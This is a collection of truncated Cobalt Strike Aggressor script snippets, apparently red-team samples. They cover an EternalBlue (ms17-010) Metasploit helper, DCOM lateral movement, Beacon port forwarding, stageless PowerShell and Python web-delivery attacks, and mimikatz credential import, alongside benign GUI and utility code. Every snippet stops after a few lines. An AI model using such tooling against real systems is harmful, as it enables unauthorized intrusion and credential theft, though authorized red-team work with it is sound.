```
#
# script to help move around with ms17-010 from Metasploit
# Go to Attacks -> Eternal Blue
#
# target, listener, where to save .rc file
sub generate_rc_file {
    local('$target $listener $where $handle $shellcode');
    ($target, $listener, $where) = @_;
```
```
#
# Demonstrate how to queue tasks to execute with each checkin...
#
#
# yield tells a function to pause and return a value. The next time the same instance of the
# function is called, it will resume after where it last yielded.
#
sub stuffToDo {
    # Tasks for first checkin
```
```
# Lateral Movement alias
# https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/
# register help for our alias
beacon_command_register("com-exec", "lateral movement with DCOM",
    "Synopsis: com-exec [target] [listener]\n\n" .
    "Run a payload on a target via DCOM MMC20.Application Object");
# here's our alias to collect our arguments
alias com-exec {
```
```
# demonstrate how to add a popup handler to a Swing component in Sleep
import java.awt.*;
import javax.swing.*;
import javax.swing.event.*;
# safely add a listener to show a popup
sub setupPopupMenu {
    # we're using fork({}) to run this in a separate Aggressor Script environment.
```
```
#
# port forward alias in Beacon and SSH
#
# pull common code into a function
sub _portfwd {
    if ($2 eq "stop") {
        btask($1, "Tasked session to stop forward to $3");
        call("beacons.pivot_stop_port", $null, $3);
    }
```
```
# search for and reproduce output that matches a specific regex.
alias search {
    local('$regex $regex2 $entry $event $bid $out $when');
    # take all of the args, without processing/parsing as normal.
    if (strlen($0) > 7) {
        $regex = substr($0, 7);
    }
    else {
        berror($1, "search [regex]");
```
```
# Scripted Web Delivery (Stageless)
#
# This script demonstrates some of the new APIs in Cobalt Strike 3.7.
# setup our stageless PowerShell Web Delivery attack
sub setup_attack {
    local('%options $script $url $arch');
    %options = $3;
    # get the arch right.
```
```
# convert comma separated keystroke values into a string.
sub toString {
    local('@temp');
    @temp = split(",", $1);
    shift(@temp);
    return join("", map({
        return chr(parseNumber($1, 16, 10));
    }, @temp));
}
```
```
# import mimikatz creds from a file.
# go to View -> Script Console
# load this script
# type importcreds /path/to/file.txt
sub process {
    if ($luser eq "(null)" || $luser eq "") {
        return;
    }
```
```
# Python Stageless Scripted Web Delivery
# setup our stageless Python Web Delivery attack
sub setup_attack {
    local('%options $x86payload $x64payload $url $script');
    %options = $3;
    # generate our stageless x86 payload
    artifact_stageless(%options["listener"], "raw", "x86", $null, $this);
    yield;
```